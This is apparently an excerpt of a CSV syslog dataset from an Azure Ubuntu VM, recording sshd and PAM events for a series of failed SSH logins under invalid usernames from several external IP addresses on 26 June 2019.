+16186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:36,UbuntuDevEnv,2019-06-26 06:53:36,auth,UbuntuDevEnv,info,Invalid user theodore from 45.59.69.138 port 36380,35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,theodore,45.59.69.1,36380,,
+16187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:36,UbuntuDevEnv,2019-06-26 06:53:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:36,UbuntuDevEnv,2019-06-26 06:53:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:38,UbuntuDevEnv,2019-06-26 06:53:37,auth,UbuntuDevEnv,info,Invalid user adminuser from 138.68.29.52 port 56042,35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,138.68.29.5,56042,,
+16190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:38,UbuntuDevEnv,2019-06-26 06:53:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:38,UbuntuDevEnv,2019-06-26 06:53:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:39,UbuntuDevEnv,2019-06-26 06:53:38,auth,UbuntuDevEnv,info,Failed password for invalid user theodore from 45.59.69.138 port 36380 ssh2,35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,theodore,45.59.69.1,36380,,
+16193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:39,UbuntuDevEnv,2019-06-26 06:53:38,auth,UbuntuDevEnv,info,Disconnected from invalid user theodore 45.59.69.138 port 36380 [preauth],35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,theodore,45.59.69.1,36380,,
+16194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:39,UbuntuDevEnv,2019-06-26 06:53:38,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 36380:11: Bye Bye [preauth],35618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,36380,,
+16195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:39,UbuntuDevEnv,2019-06-26 06:53:39,auth,UbuntuDevEnv,info,Failed password for invalid user adminuser from 138.68.29.52 port 56042 ssh2,35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,138.68.29.5,56042,,
+16196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:40,UbuntuDevEnv,2019-06-26 06:53:39,auth,UbuntuDevEnv,info,Disconnected from invalid user adminuser 138.68.29.52 port 56042 [preauth],35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,138.68.29.5,56042,,
+16197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:40,UbuntuDevEnv,2019-06-26 06:53:39,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 56042:11: Bye Bye [preauth],35627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,56042,,
+16198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:53,UbuntuDevEnv,2019-06-26 06:53:53,auth,UbuntuDevEnv,info,Invalid user sublink from 64.202.187.152 port 33516,35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,64.202.187.1,33516,,
+16199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:53,UbuntuDevEnv,2019-06-26 06:53:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:53,UbuntuDevEnv,2019-06-26 06:53:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:56,UbuntuDevEnv,2019-06-26 06:53:55,auth,UbuntuDevEnv,info,Failed password for invalid user sublink from 64.202.187.152 port 33516 ssh2,35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,64.202.187.1,33516,,
+16202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:56,UbuntuDevEnv,2019-06-26 06:53:55,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 33516:11: Bye Bye [preauth],35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,33516,,
+16203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:56,UbuntuDevEnv,2019-06-26 06:53:55,auth,UbuntuDevEnv,info,Disconnected from invalid user sublink 64.202.187.152 port 33516 [preauth],35678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,64.202.187.1,33516,,
+16204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:24,UbuntuDevEnv,2019-06-26 06:54:24,auth,UbuntuDevEnv,info,Invalid user user01 from 139.99.98.248 port 42308,35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,139.99.98.2,42308,,
+16205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:24,UbuntuDevEnv,2019-06-26 06:54:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:24,UbuntuDevEnv,2019-06-26 06:54:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:26,UbuntuDevEnv,2019-06-26 06:54:26,auth,UbuntuDevEnv,info,Failed password for invalid user user01 from 139.99.98.248 port 42308 ssh2,35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,139.99.98.2,42308,,
+16208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:26,UbuntuDevEnv,2019-06-26 06:54:26,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 42308:11: Bye Bye [preauth],35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,42308,,
+16209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:54:26,UbuntuDevEnv,2019-06-26 06:54:26,auth,UbuntuDevEnv,info,Disconnected from invalid user user01 139.99.98.248 port 42308 [preauth],35794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,139.99.98.2,42308,,
+16210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:08,UbuntuDevEnv,2019-06-26 06:55:08,auth,UbuntuDevEnv,info,Invalid user direktor from 138.68.29.52 port 45128,35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,138.68.29.5,45128,,
+16211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:08,UbuntuDevEnv,2019-06-26 06:55:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:08,UbuntuDevEnv,2019-06-26 06:55:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:10,UbuntuDevEnv,2019-06-26 06:55:10,auth,UbuntuDevEnv,info,Failed password for invalid user direktor from 138.68.29.52 port 45128 ssh2,35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,138.68.29.5,45128,,
+16214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:11,UbuntuDevEnv,2019-06-26 06:55:10,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 45128:11: Bye Bye [preauth],35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,45128,,
+16215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:11,UbuntuDevEnv,2019-06-26 06:55:10,auth,UbuntuDevEnv,info,Disconnected from invalid user direktor 138.68.29.52 port 45128 [preauth],35952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,138.68.29.5,45128,,
+16216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:22,auth,UbuntuDevEnv,info,Invalid user zs from 46.101.149.230 port 37404,35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zs,46.101.149.2,37404,,
+16217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:23,auth,UbuntuDevEnv,info,Invalid user weblogic from 64.202.187.152 port 50950,36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,64.202.187.1,50950,,
+16220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:23,UbuntuDevEnv,2019-06-26 06:55:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:25,UbuntuDevEnv,2019-06-26 06:55:24,auth,UbuntuDevEnv,info,Failed password for invalid user zs from 46.101.149.230 port 37404 ssh2,35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zs,46.101.149.2,37404,,
+16223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:25,UbuntuDevEnv,2019-06-26 06:55:24,auth,UbuntuDevEnv,info,Disconnected from invalid user zs 46.101.149.230 port 37404 [preauth],35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zs,46.101.149.2,37404,,
+16224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:25,UbuntuDevEnv,2019-06-26 06:55:24,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 37404:11: Bye Bye [preauth],35992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,37404,,
+16225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:25,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 64.202.187.152 port 50950 ssh2,36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,64.202.187.1,50950,,
+16226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:25,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 50950:11: Bye Bye [preauth],36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,50950,,
+16227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:25,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 64.202.187.152 port 50950 [preauth],36013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,64.202.187.1,50950,,
+16228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:26,auth,UbuntuDevEnv,info,Invalid user anish from 87.101.240.10 port 44354,36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,87.101.240.1,44354,,
+16229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:26,UbuntuDevEnv,2019-06-26 06:55:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:28,UbuntuDevEnv,2019-06-26 06:55:28,auth,UbuntuDevEnv,info,Failed password for invalid user anish from 87.101.240.10 port 44354 ssh2,36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,87.101.240.1,44354,,
+16232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:29,UbuntuDevEnv,2019-06-26 06:55:28,auth,UbuntuDevEnv,info,Disconnected from invalid user anish 87.101.240.10 port 44354 [preauth],36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,87.101.240.1,44354,,
+16233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:29,UbuntuDevEnv,2019-06-26 06:55:28,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 44354:11: Bye Bye [preauth],36019,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,44354,,
+16234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:38,UbuntuDevEnv,2019-06-26 06:55:38,auth,UbuntuDevEnv,info,Invalid user souris from 45.55.190.46 port 36242,35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,souris,45.55.190.4,36242,,
+16235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:38,UbuntuDevEnv,2019-06-26 06:55:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:38,UbuntuDevEnv,2019-06-26 06:55:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:40,UbuntuDevEnv,2019-06-26 06:55:40,auth,UbuntuDevEnv,info,Failed password for invalid user souris from 45.55.190.46 port 36242 ssh2,35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,souris,45.55.190.4,36242,,
+16238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:40,UbuntuDevEnv,2019-06-26 06:55:40,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 36242:11: Bye Bye [preauth],35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,36242,,
+16239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:55:40,UbuntuDevEnv,2019-06-26 06:55:40,auth,UbuntuDevEnv,info,Disconnected from invalid user souris 45.55.190.46 port 36242 [preauth],35937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,souris,45.55.190.4,36242,,
+16240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:08,UbuntuDevEnv,2019-06-26 06:56:07,auth,UbuntuDevEnv,info,Invalid user lucasb from 139.99.98.248 port 59452,36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,139.99.98.2,59452,,
+16241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:08,UbuntuDevEnv,2019-06-26 06:56:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:08,UbuntuDevEnv,2019-06-26 06:56:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:10,UbuntuDevEnv,2019-06-26 06:56:09,auth,UbuntuDevEnv,info,Failed password for invalid user lucasb from 139.99.98.248 port 59452 ssh2,36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,139.99.98.2,59452,,
+16244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:10,UbuntuDevEnv,2019-06-26 06:56:10,auth,UbuntuDevEnv,info,Disconnected from invalid user lucasb 139.99.98.248 port 59452 [preauth],36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,139.99.98.2,59452,,
+16245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:10,UbuntuDevEnv,2019-06-26 06:56:10,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 59452:11: Bye Bye [preauth],36173,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,59452,,
